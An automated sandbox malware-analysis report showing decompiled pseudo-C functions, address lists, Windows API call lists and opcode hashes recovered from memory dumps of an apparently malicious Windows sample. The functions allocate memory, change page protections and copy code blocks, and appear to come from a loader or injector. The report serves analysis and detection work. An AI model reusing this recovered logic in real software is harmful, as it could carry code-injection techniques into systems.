                                                                                                                                                                        0x004032a5
                                                                                                                                                                        0x004032a6
                                                                                                                                                                        0x004032a7
                                                                                                                                                                        0x004032aa
                                                                                                                                                                        0x004032aa
                                                                                                                                                                        0x004032ac
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004032ae
                                                                                                                                                                        0x004032ae
                                                                                                                                                                        0x004032f8
                                                                                                                                                                        0x004032b0
                                                                                                                                                                        0x004032b0
                                                                                                                                                                        0x004032b4
                                                                                                                                                                        0x004032bc
                                                                                                                                                                        0x004032c1
                                                                                                                                                                        0x004032c6
                                                                                                                                                                        0x004032d2
                                                                                                                                                                        0x004032da
                                                                                                                                                                        0x004032e1
                                                                                                                                                                        0x004032e7
                                                                                                                                                                        0x004032eb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004032eb
                                                                                                                                                                        0x004032ae
                                                                                                                                                                        0x004032ac
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403292
                                                                                                                                                                        0x00403306
                                                                                                                                                                        0x00403306
                                                                                                                                                                        0x00403306
                                                                                                                                                                        0x00403282
                                                                                                                                                                        0x00403322
                                                                                                                                                                        0x00403329

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                        • Instruction ID: 312ed2b9e062c6c4493c59e2ff7240bd31bc6bcbdb0b7b24eb198fdd60d09ece
                                                                                                                                                                        • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                        • Instruction Fuzzy Hash: F72195729002049FCB10EF69C8C1867BBA9FF45350B4581BDED55AB285DB34FA15C7E0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.429066587.0000000000435000.00000040.00020000.sdmp, Offset: 00435000, based on PE: false
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 538cd7daa44cb0be5c709bed46d95b701850ced07307e9b00aac71a02e345600
                                                                                                                                                                        • Instruction ID: e09fce20fe5d081cba04c7b23c1baab397c5943f7bd07877f57794798176e9be
                                                                                                                                                                        • Opcode Fuzzy Hash: 538cd7daa44cb0be5c709bed46d95b701850ced07307e9b00aac71a02e345600
                                                                                                                                                                        • Instruction Fuzzy Hash: A4117F733405009FD754DE55DC91EA7B3AAEB98320B29806AED09CB315E679EC42C660
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.429106240.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 538cd7daa44cb0be5c709bed46d95b701850ced07307e9b00aac71a02e345600
                                                                                                                                                                        • Instruction ID: 26e947844db9c2102a2130967bf71fe51fd30975e68f604cd91a796c8575b322
                                                                                                                                                                        • Opcode Fuzzy Hash: 538cd7daa44cb0be5c709bed46d95b701850ced07307e9b00aac71a02e345600
                                                                                                                                                                        • Instruction Fuzzy Hash: F21181733406049FD754DE59DC81FA2B3AAFB89330B298066ED04CB355E676EC41CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 73%
                                                                                                                                                                        			E004031F0(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                        				void* _t19;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        
                                                                                                                                                                        				_push(E00403244);
                                                                                                                                                                        				_push( *[fs:0x0]);
                                                                                                                                                                        				 *((intOrPtr*)(_t20 + 0x10)) = _t18;
                                                                                                                                                                        				_t19 = _t20 + 0x10;
                                                                                                                                                                        				_t4 = _t19 - 8; // 0xe8000000
                                                                                                                                                                        				 *((intOrPtr*)(_t19 - 0x18)) = _t20 -  *((intOrPtr*)(_t20 + 0x10));
                                                                                                                                                                        				_push( *_t4);
                                                                                                                                                                        				_t6 = _t19 - 4; // 0xfffffeaf
                                                                                                                                                                        				 *((intOrPtr*)(_t19 - 4)) = 0xffffffff;
                                                                                                                                                                        				 *((intOrPtr*)(_t19 - 8)) =  *_t6;
                                                                                                                                                                        				_t9 = _t19 - 0x10; // 0x4019b4
                                                                                                                                                                        				_t14 = _t9;
                                                                                                                                                                        				 *[fs:0x0] = _t14;
                                                                                                                                                                        				return _t14;
                                                                                                                                                                        			}







                                                                                                                                                                        0x004031f0
                                                                                                                                                                        0x004031fb
                                                                                                                                                                        0x00403200
                                                                                                                                                                        0x00403204
                                                                                                                                                                        0x0040320d
                                                                                                                                                                        0x00403210
                                                                                                                                                                        0x00403213
                                                                                                                                                                        0x00403214
                                                                                                                                                                        0x00403217
                                                                                                                                                                        0x0040321e
                                                                                                                                                                        0x00403221
                                                                                                                                                                        0x00403221
                                                                                                                                                                        0x00403224
                                                                                                                                                                        0x0040322a

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c4e65263c7c737316429b8658bc66cae97caeb7c030ae1029cd6c8ea9ba39084
                                                                                                                                                                        • Instruction ID: 66cb2a37692255b115f6a6b852887c2011cefdec4cff22543c71a71db66972f1
                                                                                                                                                                        • Opcode Fuzzy Hash: c4e65263c7c737316429b8658bc66cae97caeb7c030ae1029cd6c8ea9ba39084
                                                                                                                                                                        • Instruction Fuzzy Hash: 33E075B5944789EFCB10DF99C981B9EFBF8FB45610F100A5AF465D3640D3349A048B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00402844(signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                                                                                        				intOrPtr _v0;
                                                                                                                                                                        				long _v4;
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				long _v20;
                                                                                                                                                                        				long _v24;
                                                                                                                                                                        				void* _t37;
                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                        				intOrPtr* _t41;
                                                                                                                                                                        				char* _t42;
                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                        				void* _t52;
                                                                                                                                                                        				long _t53;
                                                                                                                                                                        				void* _t54;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = 2;
                                                                                                                                                                        				E004013B6(_t52, _a4, 0, 0,  &_v8);
                                                                                                                                                                        				_t53 = _v24;
                                                                                                                                                                        				_v20 = _t53;
                                                                                                                                                                        				_t56 = VirtualAlloc(0, _t53, 0x3000, 4);
                                                                                                                                                                        				if(_t56 == 0) {
                                                                                                                                                                        					L15:
                                                                                                                                                                        					_v12 = 8;
                                                                                                                                                                        					L16:
                                                                                                                                                                        					if(_t56 != 0) {
                                                                                                                                                                        						VirtualFree(_t56, 0, 0x8000);
                                                                                                                                                                        					}
                                                                                                                                                                        					return _v12;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L1;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					L1:
                                                                                                                                                                        					_t37 = E004013B6(_t52, _a4, _t56, _t53,  &_v8);
                                                                                                                                                                        					_t53 = _v24;
                                                                                                                                                                        					if(_t37 != 0 || _v4 >= _t53) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v4 = _t53;
                                                                                                                                                                        					VirtualFree(_t56, 0, 0x8000);
                                                                                                                                                                        					_t56 = VirtualAlloc(0, _t53, 0x3000, 4);
                                                                                                                                                                        					if(_t56 != 0) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					}
                                                                                                                                                                        					break;
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t56 == 0 || _v4 < _t53) {
                                                                                                                                                                        					goto L15;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_a4 = _a4 & 0x00000000;
                                                                                                                                                                        					_t14 = _t56 + 8; // 0x8
                                                                                                                                                                        					_t54 = _t14;
                                                                                                                                                                        					if( *_t56 <= 0) {
                                                                                                                                                                        						goto L16;
                                                                                                                                                                        					}
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t48 = ( *(_t54 + 0x1e) & 0x0000ffff) + _t54 + 0x20;
                                                                                                                                                                        						if(lstrcmpiA(_t48, 0x406000) == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t42 = StrChrA(_t48, 0x2e);
                                                                                                                                                                        						if(_t42 == 0) {
                                                                                                                                                                        							L11:
                                                                                                                                                                        							_t54 = _t54 + 0x120;
                                                                                                                                                                        							_v0 = _v0 + 1;
                                                                                                                                                                        							if(_v0 <  *_t56) {
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *_t42 = 0;
                                                                                                                                                                        						if(lstrcmpiA(_t48, 0x406000) == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t40 = _a8;
                                                                                                                                                                        					_v12 = _v12 & 0x00000000;
                                                                                                                                                                        					 *_t40 =  *((intOrPtr*)(_t54 + 8));
                                                                                                                                                                        					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t54 + 0xc));
                                                                                                                                                                        					_t41 = _a12;
                                                                                                                                                                        					if(_t41 != 0) {
                                                                                                                                                                        						 *_t41 =  *((intOrPtr*)(_t54 + 0x10));
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L16;
                                                                                                                                                                        				}
                                                                                                                                                                        			}


















                                                                                                                                                                        0x00402858
                                                                                                                                                                        0x00402860
                                                                                                                                                                        0x00402865
                                                                                                                                                                        0x00402879
                                                                                                                                                                        0x0040287f
                                                                                                                                                                        0x00402883
                                                                                                                                                                        0x0040294f
                                                                                                                                                                        0x0040294f
                                                                                                                                                                        0x00402957
                                                                                                                                                                        0x00402959
                                                                                                                                                                        0x00402963
                                                                                                                                                                        0x00402963
                                                                                                                                                                        0x00402974
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402889
                                                                                                                                                                        0x00402889
                                                                                                                                                                        0x00402894
                                                                                                                                                                        0x0040289b
                                                                                                                                                                        0x0040289f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004028af
                                                                                                                                                                        0x004028b3
                                                                                                                                                                        0x004028c1
                                                                                                                                                                        0x004028c5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004028c5
                                                                                                                                                                        0x004028c9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004028d5
                                                                                                                                                                        0x004028d5
                                                                                                                                                                        0x004028dd
                                                                                                                                                                        0x004028dd
                                                                                                                                                                        0x004028e0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004028e8
                                                                                                                                                                        0x004028ec
                                                                                                                                                                        0x004028fa
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004028ff
                                                                                                                                                                        0x00402907
                                                                                                                                                                        0x00402918
                                                                                                                                                                        0x00402918
                                                                                                                                                                        0x0040291e
                                                                                                                                                                        0x00402928
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040292a
                                                                                                                                                                        0x0040290f
                                                                                                                                                                        0x00402916
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402916
                                                                                                                                                                        0x0040292f
                                                                                                                                                                        0x00402933
                                                                                                                                                                        0x00402938
                                                                                                                                                                        0x0040293d
                                                                                                                                                                        0x00402940
                                                                                                                                                                        0x00402946
                                                                                                                                                                        0x0040294b
                                                                                                                                                                        0x0040294b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402946

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004013B6: GetProcAddress.KERNEL32(00406064,00000318), ref: 004013D4
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0040287D
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402963
                                                                                                                                                                          • Part of subcall function 004013B6: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 0040155A
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,00000000), ref: 004028B3
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004028BF
                                                                                                                                                                        • lstrcmpiA.KERNEL32(?,00406000,?,00000000,00000000,00000000), ref: 004028F6
                                                                                                                                                                        • StrChrA.SHLWAPI(?,0000002E), ref: 004028FF
                                                                                                                                                                        • lstrcmpiA.KERNEL32(?,00406000), ref: 00402912
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Virtual$AllocFreelstrcmpi$AddressProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1783538721-0
                                                                                                                                                                        • Opcode ID: 491aa70b1e6a50617f5bb26c7dacaca1a4cdc38919a48f016d1c3607e8ff063f
                                                                                                                                                                        • Instruction ID: 4abcd7ef27afaf1c5cc54e1fc4d0b567ca84e4e590f6a38dfb5881ad5b9a84d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 491aa70b1e6a50617f5bb26c7dacaca1a4cdc38919a48f016d1c3607e8ff063f
                                                                                                                                                                        • Instruction Fuzzy Hash: D93193B1605312ABD321DF11CE48F6BBBE8EF84754F11052AFA84B62D1D774D904CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                        			E004015D2(void* __esi) {
                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                        				long _t10;
                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                        				intOrPtr* _t19;
                                                                                                                                                                        				intOrPtr* _t20;
                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        				intOrPtr* _t23;
                                                                                                                                                                        				struct _CRITICAL_SECTION* _t25;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        
                                                                                                                                                                        				_t22 = __esi;
                                                                                                                                                                        				_t25 =  *(_t26 + 0xc);
                                                                                                                                                                        				_t9 =  *((intOrPtr*)(_t25 + 0x20));
                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                        					__imp__RemoveVectoredExceptionHandler(_t9);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t10 =  *(_t25 + 0x24);
                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                        					TlsFree(_t10);
                                                                                                                                                                        				}
                                                                                                                                                                        				if( *_t25 != 0) {
                                                                                                                                                                        					DeleteCriticalSection(_t25);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t19 = _t25 + 0x18;
                                                                                                                                                                        				_t21 =  *_t19;
                                                                                                                                                                        				if(_t21 != _t19) {
                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t23 = _t21;
                                                                                                                                                                        						_t12 =  *_t23;
                                                                                                                                                                        						_t20 =  *((intOrPtr*)(_t23 + 4));
                                                                                                                                                                        						_t21 =  *_t21;
                                                                                                                                                                        						 *_t20 = _t12;
                                                                                                                                                                        						 *((intOrPtr*)(_t12 + 4)) = _t20;
                                                                                                                                                                        						_t7 = _t23 + 0xc; // 0xc
                                                                                                                                                                        						VirtualProtect( *(_t23 + 8) << 0xc, 1,  *_t7, _t7);
                                                                                                                                                                        						E00401759(_t23);
                                                                                                                                                                        					} while (_t21 != _t19);
                                                                                                                                                                        				}
                                                                                                                                                                        				return E00401759(_t25);
                                                                                                                                                                        			}













                                                                                                                                                                        0x004015d2
                                                                                                                                                                        0x004015d4
                                                                                                                                                                        0x004015d8
                                                                                                                                                                        0x004015de
                                                                                                                                                                        0x004015e1
                                                                                                                                                                        0x004015e1
                                                                                                                                                                        0x004015e7
                                                                                                                                                                        0x004015ec
                                                                                                                                                                        0x004015ef
                                                                                                                                                                        0x004015ef
                                                                                                                                                                        0x004015f9
                                                                                                                                                                        0x004015fc
                                                                                                                                                                        0x004015fc
                                                                                                                                                                        0x00401602
                                                                                                                                                                        0x00401605
                                                                                                                                                                        0x00401609
                                                                                                                                                                        0x0040160b
                                                                                                                                                                        0x0040160c
                                                                                                                                                                        0x0040160c
                                                                                                                                                                        0x0040160e
                                                                                                                                                                        0x00401610
                                                                                                                                                                        0x00401613
                                                                                                                                                                        0x00401615
                                                                                                                                                                        0x00401617
                                                                                                                                                                        0x0040161a
                                                                                                                                                                        0x00401629
                                                                                                                                                                        0x00401630
                                                                                                                                                                        0x00401635
                                                                                                                                                                        0x00401639
                                                                                                                                                                        0x00401643

                                                                                                                                                                        APIs
                                                                                                                                                                        • RemoveVectoredExceptionHandler.KERNEL32(?,00000000,?,00400000,00402F8E,00000000,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004015E1
                                                                                                                                                                        • TlsFree.KERNEL32(?,00000000,?,00400000,00402F8E,00000000,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004015EF
                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,00000000,?,00400000,00402F8E,00000000,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004015FC
                                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000001,0000000C,0000000C,00000000,00000000,?,00400000,00402F8E,00000000,?,00000000,00401829,?,00000000), ref: 00401629
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalDeleteExceptionFreeHandlerProtectRemoveSectionVectoredVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2089334682-0
                                                                                                                                                                        • Opcode ID: ad1a18a86c5e1e2e706b0896db7b4887fb8789d1de7905578f361f352baa916e
                                                                                                                                                                        • Instruction ID: abcb594cb904f911564d6ee301b284767340d68b6534243a15feff00a902482c
                                                                                                                                                                        • Opcode Fuzzy Hash: ad1a18a86c5e1e2e706b0896db7b4887fb8789d1de7905578f361f352baa916e
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B015EB6200204AFD7109F54DC88E9B77ACFF88315B04842AFA56B7360D739EC40CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 41%
                                                                                                                                                                        			E00401152(void* __ecx, intOrPtr __edx, intOrPtr* __esi, void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                        				intOrPtr _v984;
                                                                                                                                                                        				intOrPtr _v988;
                                                                                                                                                                        				signed int _v1112;
                                                                                                                                                                        				intOrPtr _v1116;
                                                                                                                                                                        				intOrPtr _v1188;
                                                                                                                                                                        				void _v1228;
                                                                                                                                                                        				int _v1232;
                                                                                                                                                                        				char _v1236;
                                                                                                                                                                        				char _v1240;
                                                                                                                                                                        				intOrPtr _v1248;
                                                                                                                                                                        				intOrPtr _v1252;
                                                                                                                                                                        				intOrPtr _v1256;
                                                                                                                                                                        				intOrPtr _v1260;
                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                        				char* _t42;
                                                                                                                                                                        				long _t50;
                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                        				intOrPtr* _t59;
                                                                                                                                                                        				void* _t61;
                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                        				intOrPtr* _t66;
                                                                                                                                                                        				intOrPtr* _t68;
                                                                                                                                                                        
                                                                                                                                                                        				_t68 = __esi;
                                                                                                                                                                        				_t64 = __edx;
                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                        				_t59 = _a4;
                                                                                                                                                                        				_v1236 = 0;
                                                                                                                                                                        				_v1232 = 0;
                                                                                                                                                                        				memset( &_v1228, 0, 0x4c8);
                                                                                                                                                                        				_t66 = E0040176E(_t64);
                                                                                                                                                                        				_t5 = _t68 + 0x218; // 0x218
                                                                                                                                                                        				_v1188 = 0x100003;
                                                                                                                                                                        				memcpy(_t5, E004031BD, 0x100);
                                                                                                                                                                        				_t41 = E004018E5(_t61,  *_t59);
                                                                                                                                                                        				_v1260 = _t41;
                                                                                                                                                                        				if(_t41 != 0) {
                                                                                                                                                                        					_t42 =  &_v1236;
                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                        					_push(_t64);
                                                                                                                                                                        					_push(_t42);
                                                                                                                                                                        					_v1252 = _t42;
                                                                                                                                                                        					_v1248 = _t64;
                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                        					_push(_t64);
                                                                                                                                                                        					_push( *((intOrPtr*)(_t59 + 4)));
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(2);
                                                                                                                                                                        					_push( *((intOrPtr*)(_t66 + 4)));
                                                                                                                                                                        					_push( *_t66);
                                                                                                                                                                        					if(E00403150() >= 0) {
                                                                                                                                                                        						_t14 = _t68 + 0x18; // 0x18
                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                        						if( *((intOrPtr*)(__esi + 0x10)) == _t14 &&  *((intOrPtr*)(__esi + 0x14)) == _t64) {
                                                                                                                                                                        							asm("adc ecx, ecx");
                                                                                                                                                                        							 *((intOrPtr*)(__esi + 0x10)) = _v1256 + 0x18;
                                                                                                                                                                        							 *((intOrPtr*)(__esi + 0x14)) = 0;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *_t68 = _v988;
                                                                                                                                                                        						 *((intOrPtr*)(_t68 + 4)) = _v984;
                                                                                                                                                                        						if(E004012A3( *_t59, _v1256, _t68,  &_v1240) == 0) {
                                                                                                                                                                        							goto L11;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t51 = _v1256;
                                                                                                                                                                        							_push(_v1248);
                                                                                                                                                                        							_v1112 = _v1112 & 0x00000000;
                                                                                                                                                                        							_push(_v1252);
                                                                                                                                                                        							_v1116 = _t51;
                                                                                                                                                                        							asm("cdq");
                                                                                                                                                                        							_v988 = _t51 + 0x218;
                                                                                                                                                                        							_v984 = _t64;
                                                                                                                                                                        							asm("cdq");
                                                                                                                                                                        							_push(_t64);
                                                                                                                                                                        							_push( *((intOrPtr*)(_t59 + 4)));
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(2);
                                                                                                                                                                        							_push( *((intOrPtr*)(_t66 + 0xc)));
                                                                                                                                                                        							_push( *((intOrPtr*)(_t66 + 8)));
                                                                                                                                                                        							if(E00403150() < 0) {
                                                                                                                                                                        								goto L3;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t50 = 0;
                                                                                                                                                                        								goto L10;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						L3:
                                                                                                                                                                        						_t50 = 5;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t50 = GetLastError();
                                                                                                                                                                        					L10:
                                                                                                                                                                        					if(_t50 == 0xffffffff) {
                                                                                                                                                                        						L11:
                                                                                                                                                                        						_t50 = GetLastError();
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t50;
                                                                                                                                                                        			}

























                                                                                                                                                                        0x00401152
                                                                                                                                                                        0x00401152
                                                                                                                                                                        0x00401152
                                                                                                                                                                        0x0040115f
                                                                                                                                                                        0x0040116b
                                                                                                                                                                        0x0040116f
                                                                                                                                                                        0x00401178
                                                                                                                                                                        0x0040118a
                                                                                                                                                                        0x0040118c
                                                                                                                                                                        0x00401198
                                                                                                                                                                        0x004011a0
                                                                                                                                                                        0x004011aa
                                                                                                                                                                        0x004011b1
                                                                                                                                                                        0x004011b5
                                                                                                                                                                        0x004011c2
                                                                                                                                                                        0x004011c6
                                                                                                                                                                        0x004011c7
                                                                                                                                                                        0x004011c8
                                                                                                                                                                        0x004011c9
                                                                                                                                                                        0x004011d0
                                                                                                                                                                        0x004011d4
                                                                                                                                                                        0x004011d5
                                                                                                                                                                        0x004011d6
                                                                                                                                                                        0x004011d7
                                                                                                                                                                        0x004011d9
                                                                                                                                                                        0x004011db
                                                                                                                                                                        0x004011de
                                                                                                                                                                        0x004011ea
                                                                                                                                                                        0x004011f7
                                                                                                                                                                        0x004011fa
                                                                                                                                                                        0x004011fd
                                                                                                                                                                        0x0040120f
                                                                                                                                                                        0x00401211
                                                                                                                                                                        0x00401214
                                                                                                                                                                        0x00401214
                                                                                                                                                                        0x0040121e
                                                                                                                                                                        0x00401227
                                                                                                                                                                        0x0040123d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040123f
                                                                                                                                                                        0x0040123f
                                                                                                                                                                        0x00401243
                                                                                                                                                                        0x00401247
                                                                                                                                                                        0x0040124f
                                                                                                                                                                        0x00401253
                                                                                                                                                                        0x0040125f
                                                                                                                                                                        0x00401260
                                                                                                                                                                        0x0040126a
                                                                                                                                                                        0x00401271
                                                                                                                                                                        0x00401272
                                                                                                                                                                        0x00401273
                                                                                                                                                                        0x00401274
                                                                                                                                                                        0x00401276
                                                                                                                                                                        0x00401278
                                                                                                                                                                        0x0040127b
                                                                                                                                                                        0x00401288
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040128e
                                                                                                                                                                        0x0040128e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040128e
                                                                                                                                                                        0x00401288
                                                                                                                                                                        0x004011ec
                                                                                                                                                                        0x004011ec
                                                                                                                                                                        0x004011ee
                                                                                                                                                                        0x004011ee
                                                                                                                                                                        0x004011b7
                                                                                                                                                                        0x004011b7
                                                                                                                                                                        0x00401290
                                                                                                                                                                        0x00401293
                                                                                                                                                                        0x00401295
                                                                                                                                                                        0x00401295
                                                                                                                                                                        0x00401295
                                                                                                                                                                        0x00401293
                                                                                                                                                                        0x004012a0

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.NTDLL ref: 00401178
                                                                                                                                                                        • memcpy.NTDLL ref: 004011A0
                                                                                                                                                                          • Part of subcall function 004018E5: RtlNtStatusToDosError.NTDLL ref: 0040191D
                                                                                                                                                                          • Part of subcall function 004018E5: SetLastError.KERNEL32(00000000), ref: 00401924
                                                                                                                                                                        • GetLastError.KERNEL32(00000010,00000218,004031BD,00000100,?,00000318,00000008), ref: 004011B7
